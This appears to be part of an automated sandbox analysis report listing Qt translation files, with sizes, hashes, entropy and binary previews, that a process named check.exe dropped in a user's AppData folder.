                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TW....n.....q.t.b.a.s.e._.z.h._.T.W...$.q.t.m.u.l.t.i.m.e.d.i.a._.z.h._.T.W...&.q.t.x.m.l.p.a.t.t.e.r.n.s._.z.h._.T.W
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):160017
                                                                                                                                                                                                            Entropy (8bit):5.35627970915292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:XGlAMfkX1M0RdaCkR8lfv8vtc8EFrVYA2I4AJZWEWgHg1C8COvzHKHC6Jp9NV0V7:XUr0RACkIwDEpV1Lgf1ubtw3Bb
                                                                                                                                                                                                            MD5:A7E4D0BA0FC5DF07F62CC66EC9878979
                                                                                                                                                                                                            SHA1:21FD131B23BDD1BBA7BBB86F3ED5C83876F45638
                                                                                                                                                                                                            SHA-256:E03FE68D83201543698FD7FE267DD5DFC5BFD195147E74FF2F19AC3491401263
                                                                                                                                                                                                            SHA-512:D9E6B10506FCF20B5B783F011908083D9DF6C5DF88E21B10D07F53A01AD6506A4B921C85335A25BAE54E27BAD7D01B6E240D58FDEEAABC7FF32014EC120C2ECF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......arB..2....*.......+.......@.......A.......B..._...C......D.......E......F.......G... ...H...D...I...h...P...C...Q...g...R......S.......T.......U.......V...x...W......X.......Y.......]..'=...s......t...........]...........;..'....;..(....;.......;.......M..'e...O.......O...9...........}..'........C...=......m..'....t..........!o..(5...Z..+;..5u..+;..c...+O......1...!...D@...8..E@.....H4...,..HY..QI..H.......IC......J....1..J.......J.......LD......L.......PS......QR...R..R...V2..T.......U....]..X.......Zr.....[`......\....t..]x......_......._.......yg......1...6....E..8V..............C............................$..RN...[...0...,.......y.......y...................K...........9..R....E.."............z.......................%..F;...D...[..................................!....5.......0...I...0.......0...5...0..#....5.......5...p..............W}.. D..(... D..P=..+.......<U......<U......<.......H5..(...H5..P...L.......VE......VE......V....B..f...JJ..f.......f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165337
                                                                                                                                                                                                            Entropy (8bit):5.332219158085151
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:9ULiyUxPoT6qx+J7FJlaaMJnxjqxq+0Uiff0mbVeb7wiEwYuYqDKBkKHMXHCIMll:9ULpIVFnpwUiEujw27ncUQUz
                                                                                                                                                                                                            MD5:660413AD666A6B31A1ACF8F216781D6E
                                                                                                                                                                                                            SHA1:654409CDF3F551555957D3DBCF8D6A0D8F03A6C5
                                                                                                                                                                                                            SHA-256:E448AC9E3F16C29EB27AF3012EFE21052DAA78FABFB34CD6DFF2F69EE3BD3CDB
                                                                                                                                                                                                            SHA-512:C6AE4B784C3D302D7EC6B9CE7B27DDAF00713ADF233F1246CD0475697A59C84D6A86BAA1005283B1F89FCC0835FD131E5CF07B3534B66A0A0AA6AC6356006B8F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bg_BGB../....*..,....+..."...@...]...A.......B.......C.......D...P...E...!...F.......G.......H.......I.......P.......Q.......R...A...S...e...T.......U.......V.......W...1...X...U...Y...y...]..,....s...,...t...................P...;..+....;..-E...;..!....;..+....M..,Y...O...,...O...........*...}..,............=...Q...m..,....t...|......>...(5..1...+;..<...+;..o...+O...r..1...>...D@......E@......H4......HY..[...H.......IC......J....E..J....X..J.......LD......L....L..PS......QR.."...R...`...T....X..U.......X.......Zr...q..[`...`..\.......]x......_......._....T..yg.....1...=....E..?...............L(.......(...............'...$..\....[.......,...I...y...!...y...................S...........9..]%...E..5p...........z..!q...................%..O....D..................D.....8......:......?....5...&...0.......0.. ....0...c...0..5....5.......5..................b:.. D..-... D..Z...+.......<U......<U...0..<.......H5..-...H5..[...L.......VE..#a..VE..;...V.......f...T...f...!..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):210159
                                                                                                                                                                                                            Entropy (8bit):4.666388181115542
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:P/DVhdlafzvZfeW+6kXEVjSVPzC3ceKdP2:xYf7UW+WjwP2
                                                                                                                                                                                                            MD5:B383F6D4B9EEA51C065E73ECB95BBD23
                                                                                                                                                                                                            SHA1:DD6C2C4B4888B0D14CEBFC86F471D0FC9B07FE42
                                                                                                                                                                                                            SHA-256:52E94FCC9490889B55812C5433D009B44BDC2DC3170EB55B1AF444EF4AAE1D7F
                                                                                                                                                                                                            SHA-512:9401940A170E22CE6515E3C1453C563D93869A3C3686C859491A1F8795520B61BF3F0BFE4687A7380C0CC0C75E25559354FDB5CEF916AF4C5B6CD9661464A54A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......caB..7....*.......+.../...@..:P...A..:t...B..:....C..:....D..;=...E..<....F..<Z...G..<~...H..<....I..<....P..>....Q..>....R..?....S..?R...T..?v...U..?....V..?....W..@....X..@<...Y..@`...]../....s..1....t..........2s......#p...;.......;../....;..W....;..e+...M../3...O.......O..9.......J....}../]......8....=..9....m../....t..9Y.......S..(5..lB..+;.._...+;...=..+O..U...1.......D@..:...E@..?...H4...J..HY..~...H..."...IC...0..J....W..J....0..J.......LD..!...L...!f..PS..)...QR.."...R.......T...9~..U...9...U...z...X...>...Zr..E...[`...e..\...LD..]x..7U.._......._...M...yg..f...1...a....E..c....7.........U.......p........b.......4.......K...$.......[.......,.......y.......y...................^...........9...:...E...s...... (...z..":.......d......!....%..tQ...D.."......."......2......ve.....y...........5..#H...0...\...0..W+...0..';...0.......5..(....5..........)s.......... D..0w.. D..}...+...1...<?..5x..<U......<U..5...<...6@..H5..0...H5..~...L...9...VE..$...V...SV..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):174701
                                                                                                                                                                                                            Entropy (8bit):4.87192387061682
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:5WjuhX0CVRaakGjW9E8SSOQfX/JlwVOMxrboRPqWxXfQvO7zjBf:5iFGj1QfXr8Gd
                                                                                                                                                                                                            MD5:C57D0DE9D8458A5BEB2114E47B0FDE47
                                                                                                                                                                                                            SHA1:3A0E777539C51BB65EE76B8E1D8DCE4386CBC886
                                                                                                                                                                                                            SHA-256:03028B42DF5479270371E4C3BDC7DF2F56CBBE6DDA956A2864AC6F6415861FE8
                                                                                                                                                                                                            SHA-512:F7970C132064407752C3D42705376FE04FACAFD2CFE1021E615182555F7BA82E7970EDF5D14359F9D5CA69D4D570AA9DDC46D48CE787CFF13D305341A3E4AF79
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs_CZB..3p...*..F....+.......@..!....@..Ef...A..!....A..E....B.."1...B..E....C.."U...C..E....D.."....D..F....E..#p...E..F)...F..#....F..FP...G..#....G..Fw...H..$....H..F....I..$6...I..F....P..&%...P..Gr...Q..&I...Q..G....R..&....R..G....S..&....S..H....T..&....T..H8...U..'....U..H_...V..'Z...V..H....W..'~...W..H....X..'....X..H....Y..'....Y..H....]..,....]..,....s.......t...9...............*...;.......;..+....;..1B...;......;..?x...;..N....;..iY...;..s3...M..,B...M..,....O.......O...w...O..rr...........}..,j...}..-....... 5...=.. ....m..,....m..-8...t.. .......ay..(5..TT..+;...A..+;..B...+;..u...+O......+O..=a..1...a...D@.."...E@..&m..E@..G...F...J...H4...=..HY..`...H.......I...J...IC......J....-..J.......J.......LD......L....(..PS.....QR.."S..R...e...T.... ..U......X.......Zr...g..[`......\......]x......_......._......._...v...yg......1...C....E..E...............=.......Q........................s...$..a....[.......,.......y.......y...y..............G..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):181387
                                                                                                                                                                                                            Entropy (8bit):4.755193800761075
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:XzswP2UvZ5aZ9jFTkmq/gnBNW/+PcWrqm2Vliz0DGdaS4KSLZjwTTgwUR0toT:j3m27AjCT
                                                                                                                                                                                                            MD5:859CE522A233AF31ED8D32822DA7755B
                                                                                                                                                                                                            SHA1:70B19B2A6914DA7D629F577F8987553713CD5D3F
                                                                                                                                                                                                            SHA-256:7D1E5CA3310B54D104C19BF2ABD402B38E584E87039A70E153C4A9AF74B25C22
                                                                                                                                                                                                            SHA-512:F9FAA5A19C2FD99CCD03151B7BE5DDA613E9C69678C028CDF678ADB176C23C7DE9EB846CF915BC3CC67ABD5D62D9CD483A5F47A57D5E6BB2F2053563D62E1EF5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......daB..4....*..h....+......@...f...A.......B.......C.......D...U...E.......F...v...G.......H.......I.......P.......Q.......R...6...S...Z...T...~...U.......V.......W..."...X...F...Y...j...]..+....s.......t..................-...;..+....;..,....;../....;..;....M..+....O.......O...r...........}..,............=...8...m..,0...t...c......T...(5..B...+;..NH..+;..~H..+O..,...1...UP..D@......E@......H4...E..HY..j...H.......IC...#..J....J..J.......J.......LD......L....1..PS...B..QR......R...o...T.......U.......X.......Zr......[`...W..\....}..]x...[.._....-.._.......yg...e..1...O....E..R....7..........-!......]............................$..k....[...7...,.......y...c...y.................j4...........9..l8...E..p............z...;..................%..a....D...~.............-.....L......OH.....Uz...5.......0.......0...U...0.......0..p....5...7...5..L$..............p... D..-... D..i...+....@..<U.....<U.....<....S..H5..-2..H5..j$..L....B..VE.. ...VE..P...V...*...f...e...f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):220467
                                                                                                                                                                                                            Entropy (8bit):4.626295310482312
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:7w8go8+ph6JVB8XVXYWpSNEeg8+vaD+p4N8DDiEKugwGZulh15ce4M+4NsPYXCZW:88h8Sj286tTiDD
                                                                                                                                                                                                            MD5:40760A3456C9C8ABE6EA90336AF5DA01
                                                                                                                                                                                                            SHA1:B249AA1CBF8C2636CE57EB4932D53492E4CE36AC
                                                                                                                                                                                                            SHA-256:553C046835DB9ADEF15954FA9A576625366BA8BFD16637038C4BCD28E5EBACE1
                                                                                                                                                                                                            SHA-512:068E55F39B5250CC937E4B2BD627873132D201D351B9351BE703CD9B95D3BAFB4BD649CB4DF120A976D7C156DA679758D952CAC5E0523107244E517D323BC0C5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......de_DEB..7....*.......+..3....@..R....A..R....B..S....C..S@...D..S....E..T]...F..T....G..T....H..T....I..U#...P..W....Q..W6...R..W....S..W....T..W....U..W....V..XG...W..Xk...X..X....Y..X....]..2%...s..J$...t..9R......J.......B....;..1....;..3....;..q....;.......M..2O...O.......O..X@......ia...}..2y......Q....=..Q....m..2....t..Q...........(5......+;..ev..+;......+O..oh..1....4..D@..R...E@..WZ..H4..4...HY...[..H...AY..IC..>o..J...>...J.......J...>6..LD..@A..L...@...PS..I...QR..#...R....h..T...W...U...Xh..U....~..X...]...Zr..e(..[`..)...\...j...]x..O..._....K.._...lI..yg...U..1...f....E..i....7..........o.......wG......6.......6.......8....$...n...[..8....,..9....y.......y..=................3......>....9.......E..."......?_...z..#d.......0......A%...%..z....D..A.......B......KP......2.............^...5..B....0.......0..p....0..F....0...}...5..G....5..........H........... D..3}.. D...O..+...Q...<?..Ti..<U......<U..T...<...U)..H5..3...H5......L...X...VE..%j..V...l..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165170
                                                                                                                                                                                                            Entropy (8bit):4.679910767547088
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:JVwzuvb+Ta64KQd84arHX5pxiVhA8QlOD/BnFNa8NsvsfFsfcoZtIx6F:JVwSTG4KqVaLX5pEVK7OJFczstgRtIx8
                                                                                                                                                                                                            MD5:C7C58A6D683797BFDD3EF676A37E2A40
                                                                                                                                                                                                            SHA1:809E580CDBF2FFDA10C77F8BE9BAC081978C102B
                                                                                                                                                                                                            SHA-256:4FFDA56BA3BB5414AB0482D1DDE64A6F226E3488F6B7F3F11A150E01F53FA4C8
                                                                                                                                                                                                            SHA-512:C5AED1A1AA13B8E794C83739B7FDDEAFD96785655C287993469F39607C8B9B0D2D8D222ECD1C13CF8445E623B195192F64DE373A8FB6FE43743BAF50E153CDA5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es_ESB../....*..*,...+...y...@.......A.......B.......C.......D...v...E...=...F.......G.......H.......I.......P.......Q... ...R...k...S.......T.......U.......V...1...W...U...X...y...Y.......]..+....s.......t...................c...;..+....;..,....;...%...;..#....;..-....M..+....O.......O...............}..,............=...]...m..,/...t..........A...(5..3...+;..<...+;..o...+O..!b..1...Ap..D@......E@...D..H4...-..HY..[F..H.......IC...%..J....L..J.......J.......LD......L....O..PS......QR..!...R...`K..T.......U....&..X.......Zr.....[`...h..\......]x...|.._....Y.._....A..yg......1...=....E..?a......!.......K........G...............R...$..\Q...[.......,...z...y.......y..................+............9..\....E..2............z.. ....................%..ON...D........................:......=B.....A....5...7...0.......0......0.."....0...,...0..3....5...}...5...Y..............a... D..-!.. D..Z6..+....0..<U...h..<U......<.......H5..-M..H5..Z...L.......VE.."...VE..>...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179941
                                                                                                                                                                                                            Entropy (8bit):4.720938209922096
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:lvdTgO2Yl97ZWnbgTLt/Tf9IlqAeiy5uWkYGM0wNCdRjSK2YUlUs:lvdkA9vh5uWkY0MK2YXs
                                                                                                                                                                                                            MD5:8472CF0BF6C659177AD45AA9E3A3247C
                                                                                                                                                                                                            SHA1:7B5313CDA126BB7863001499FB66FB1B56C255FC
                                                                                                                                                                                                            SHA-256:E47FE13713E184D07FA4495DDE0C589B0E8F562E91574A3558A9363443A4FA72
                                                                                                                                                                                                            SHA-512:DE36A1F033BD7A4D6475681EDC93CC7B0B5DCB6A7051831F2EE6F397C971B843E1C10B66C4FB2EFF2A23DC07433E80FBF7B95E62C5B93E121AB5AD88354D9CB8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fiB..38...*..ct...+......@.......A.......B.......C...@...D.......E...]...F.......G.......H.......I...#...P.......Q...6...R.......S.......T.......U.......V...G...W...k...X.......Y.......]..*....s...T...t.......................;..*....;..+....;..&....;..3....M..+!...O.......O...e...........}..+K...........=.......m..+w...t..........J...(5..9...+;..:y..+;..mW..+O..$...1...KY..D@......E@...Z..H4...l..HY..X&..H.......IC......J.......J...."..J......LD.....L.......PS...'..QR.. L..R...]...T.......U.......X.......Zr......[`......\.......]x......_....k.._....>..yg.. /..1...;....E..>....7..{(......%.......J........T.......&.......U...$..Y[...[......,...s...y.......y...a.......}......d...........9..Y....E..k'...........z...........V..........%..M....D...Q.......{......d.....A......E......K....5.......0.......0..&J...0.......0..k....5...*...5..I9.............._:.. D..,O.. D..W...+....9..<U...G..<U...*..<.......H5..,y..H5..W...H5......L....5..VE..!u..VE..E...V..."{..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):166167
                                                                                                                                                                                                            Entropy (8bit):4.685212271435657
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:CLZ1w8McowCppcPwL5pYFw+G00QsbLckCiWxvq+sjs06oFm:C91wxcowspc4L5pUw+cz39CiQ7tloFm
                                                                                                                                                                                                            MD5:1F41FF5D3A781908A481C07B35998729
                                                                                                                                                                                                            SHA1:ECF3B3156FFE14569ECDF805CF3BE12F29681261
                                                                                                                                                                                                            SHA-256:EDB32A933CEF376A2636634E14E2977CED6284E4AA9A4AC7E2292F9CA54C384A
                                                                                                                                                                                                            SHA-512:A492E8AC88095A38A13549C18C68E1F61C7054AB9362C2B04C65B93E48E4A07941C8DA6950BAE79041094623E0ED330CA975110FDE8248B4D9380B9F729AD891
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr_FRB../....*..-....+.......@.......A.......B.......C...?...D.......E...\...F.......G.......H.......I..."...P.......Q...5...R.......S.......T.......U.......V...F...W...j...X.......Y.......]..+....s...=...t.......................;..+....;..,....;.......;..$b...;.......M..,....O.......O...5...........}..,3...........=.......m..,]...t..........A...(5..5j..+;..<T..+;..o...+O.."+..1...B\..D@......E@...Y..H4...8..HY..[{..H.......IC......J.......J.......J.......LD...|..L.......PS...?..QR..!...R...`j..T.......U....[..X.......Zr.....[`...)..\......]x......_....7.._.......yg...i..1...=Q...E..?@......"Y......K............................$..\....[...^...,...'...y.......y...+.......o....../c.......Y...9..\....E..6(...........z..!................j...%..OC...D...+.......[......a.....;......>......B....5.......0.......0...m...0..#....0.......0..6....5.......5..................a... D..-Y.. D..Ze..+....]..<U...;..<U......<.......H5..-...H5..Z...L.......VE.."...VE..?...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):189580
                                                                                                                                                                                                            Entropy (8bit):4.630160941635514
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:SiaI3C87jhakhR0VGkw7ys7CskUH6y4e6IFB4xyMuhvDnJGhFaCo527arBbm07LZ:S2yGjh17yGqxTXhvQoejJd8FUjVgk
                                                                                                                                                                                                            MD5:EB1FB93B0BE51C2AD78FC7BA2F8B9F42
                                                                                                                                                                                                            SHA1:24F7FF809E2F11C579CD388FEA5A4C552FF8D4D0
                                                                                                                                                                                                            SHA-256:63B439DD44139AA3AED54C2EBE03FA9BC77F22C14ED8FBA8EFF2608445BB233D
                                                                                                                                                                                                            SHA-512:E13770AEF33B6666ED7D54E03EE20CA291D4167D673BA6C61D8E64CDD5F7FFE0A9521B95AF67BE719BF263932ECF16E2B2D0B5F3404F9BCD7879114FCC6FC474
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gd_GBB..2....*...u...+......@.......A...B...B.......C.......D.. ....E.. ....F..!&...G..!J...H..!n...I..!....P..#m...Q..#....R..#....S..$....T..$$...U..$H...V..$....W..$....X..$....Y..%....]../....s...'...t...................F...;.......;../....;..=V...;..G....M../G...O.......O...k......$....}../o.......i...=.......m../....t..........[...(5..M...+;..@...+;..x...+O..:...1...\7..D@...f..E@..#...H4...p..HY..be..H.......IC......J.......J....R..J.......LD......L.......PS......QR..#l..R...g...T.......U.......X....\..Zr......[`......\...&...]x......_....C.._...'t..yg..?...1...BM...E..D.......;.......R'.......t.......@.......?...$..c....[......,...i...y.......y...Y.......f.......+...........9..c....E...............z.."....................%..U....D..................G.....UB.....W......\]...5.......0.......0..<....0...;...0.......5.......5..ij..............h... D..0... D..aC..+....K..<U.....<U...~..<.......H5..0...H5..a...L....1..VE..$...VE..X...V...8|..f...Z...f...=..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):138690
                                                                                                                                                                                                            Entropy (8bit):5.515748942553918
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:XSue8Z7T3iJsqBejt/zNHSLzdetY2ZISfC/S:XSueK3w7Ijt8zUtYAISfC/S
                                                                                                                                                                                                            MD5:DEAF87D45EE87794AB2DC821F250A87A
                                                                                                                                                                                                            SHA1:DB39C6BAA443AA9BB208043EF7FB7E3403C12D90
                                                                                                                                                                                                            SHA-256:E1EBCA16AFE8994356F81CA007FBDB9DDF865842010FE908923D873B687CAD3F
                                                                                                                                                                                                            SHA-512:276FCE81249EFFE19E95607C39F9ACB3A4AFA3F90745DA21B737A03FEA956B079BCA958039978223FD03F75AC270EC16E46095D0C6DDA327366C948EC2D05B9C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......he_ILB../....*......+..Sw...@......A......B.......C.......D...X...E.......F.../...G...O...H...o...I......P.......Q.......R...I...S...i...T......U......V.......W.......X.../...Y...O...]..$....s......t..X:.......4......`Y...;..$....;..%....;.......;...5...;.......M..$....O...6...O..s............}..%-...........=...m...m..%k...t..........^..(5......+;..2...+;..^...+O...N..1.......D@......E@...(..H4..T...HY..L...H..._...IC..\...J...\...J.......J...\j..LD..^...L...^o..PS..fl..QR......R...Q...T...su..U...s...X...x3..Zr..~...[`..L\..\.......]x....._......._....o..yg...(..1...3....E..5C.......z......?V......U.......U.......W....$..M....[..W....,..X....y.......y..\........a..............\@...9..NO...E...?......]s...z...G.......(......^....%..B^...D.._......._.................... ..........5..`/...0.......0...L...0......0..d(...0......5..ek...5..........fB......R... D..&O.. D..K...+...l...<U......<U..p)..<...p...H5..&w..H5..La..L...s...VE......VE......V.....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):160494
                                                                                                                                                                                                            Entropy (8bit):4.831791320613137
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:BmOMZadV9n51xXeQvjOiIzz7/Vs9Db3ihuJNvMfWxBNlYzYbTrIkfwb03l24cNKu:HkWa5pg0MahBHDd
                                                                                                                                                                                                            MD5:E9D302A698B9272BDA41D6DE1D8313FB
                                                                                                                                                                                                            SHA1:BBF35C04177CF290B43F7D2533BE44A15D929D02
                                                                                                                                                                                                            SHA-256:C61B67BB9D1E84F0AB0792B6518FE055414A68E44D0C7BC7C862773800FA8299
                                                                                                                                                                                                            SHA-512:12947B306874CF93ABA64BB46FAC48179C2D055E770D41AF32E50FFFB9F0C092F583AFCEA8B53FE9E238EF9370E9FFFBEB581270DFA1A7CB74EBE54D9BFF459F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu_HUB../....*.......+.......@.......A...0...B...{...C.......D.......E.......F.......G...<...H...`...I.......P...s...Q.......R.......S.......T...*...U...N...V.......W.......X.......Y.......]..+y...s.......t.......................;..+Q...;..,U...;.......;.......;..&....M..+....O.......O...U..........}..+............=.......m..+....t..........9c..(5..,...+;..;...+;..m7..+O......1...9...D@...T..E@......H4...v..HY..Y...H.......IC......J.......J.......J.......LD......L.......PS...}..QR..!...R...]...T.......U....{..X.......Zr...=..[`......\....*..]x...-.._......._......yg...M..1...<....E..>...............J........T.......(.......S...$..Z....[.......,...u...y.......y...[...............#...........9..Z....E..#&...........z..!'...................%..Mv...D..._....................32.....5......9....5.......0...h...0...E...0.......0.......0..#....5...Z...5...........G......_2.. D..,... D..W...+....W..<U......<U...B..<.......H5..,...H5..X{..L....)..VE.."...VE..6l..V....*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):161172
                                                                                                                                                                                                            Entropy (8bit):4.680034416311688
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:eSfxfdO4BKJb0td5pqCOIUP/PFIM7gxGQ9sRrFM6QJ4m8ihkM:eSfxFO4BKJb0td5pnOrvCqg9mRK4IkM
                                                                                                                                                                                                            MD5:88D040696DE3D068F91E0BF000A9EC3E
                                                                                                                                                                                                            SHA1:F978B265E50D14FDDE9693EC96E99B636997B74D
                                                                                                                                                                                                            SHA-256:7C7DC8B45BF4E41FEC60021AB13D9C7655BE007B8123DB8D7537A119EB64A366
                                                                                                                                                                                                            SHA-512:F042637B61C49C91043D73B113545C383BD8D9766FD4ACC21675B4FF727652D50863E72EA811553CB26DF689F692530184A6CE8FE71F9250B5A55662AFE7D923
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it_ITB../....*.......+.......@.......A..."...B...m...C.......D.......E.......F.......G...0...H...T...I...x...P...q...Q.......R.......S.......T...(...U...L...V.......W.......X.......Y.......]..+....s...'...t...................^...;..+[...;..,g...;.......;.......;..!B...M..+....O...D...O...........(...}..+........I...=.......m..,....t..........4...(5..'...+;..<...+;..oV..+O......1...5...D@...F..E@......H4...J..HY..Z...H.......IC...L..J....s..J....j..J.......LD......L....f..PS......QR..!...R..._...T.......U....3..X.......Zr......[`...Q..\.......]x......_......._....0..yg...C..1...=....E..?o..............Kf.......h.......8.......I...$..[....[.......,...m...y...9...y...........z.......z...........9..\=...E..$u.......:...z.. k...................%..N....D..................M............0......5/...5...2...0.......0...0...0...A...0...)...0..$....5.......5...J.......a......a... D..,... D..Y...+.......<U......<U......<....v..H5..-...H5..Z...L.......VE.."c..VE..1...V....X.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):129911
                                                                                                                                                                                                            Entropy (8bit):5.802855391832282
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:W8YYSCjKBJ26c1Z7f25pVmuLXpxfqt7FEUWNrfQje9kWI23pKXvx:xYuKBJ01Z7u5pQuLbESUWNzAAI23pKfx
                                                                                                                                                                                                            MD5:608B80932119D86503CDDCB1CA7F98BA
                                                                                                                                                                                                            SHA1:7F440399ABA23120F40F6F4FCAE966D621A1CC67
                                                                                                                                                                                                            SHA-256:CBA382ACC44D3680D400F2C625DE93D0C4BD72A90102769EDFD1FE91CB9B617B
                                                                                                                                                                                                            SHA-512:424618011A7C06748AADFC2295109D2D916289C81B01C669DA4991499B207B781604A03259C546739A3A6CF2F8F6DFA753B23406B2E2812F5407AEE343B5CBDD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
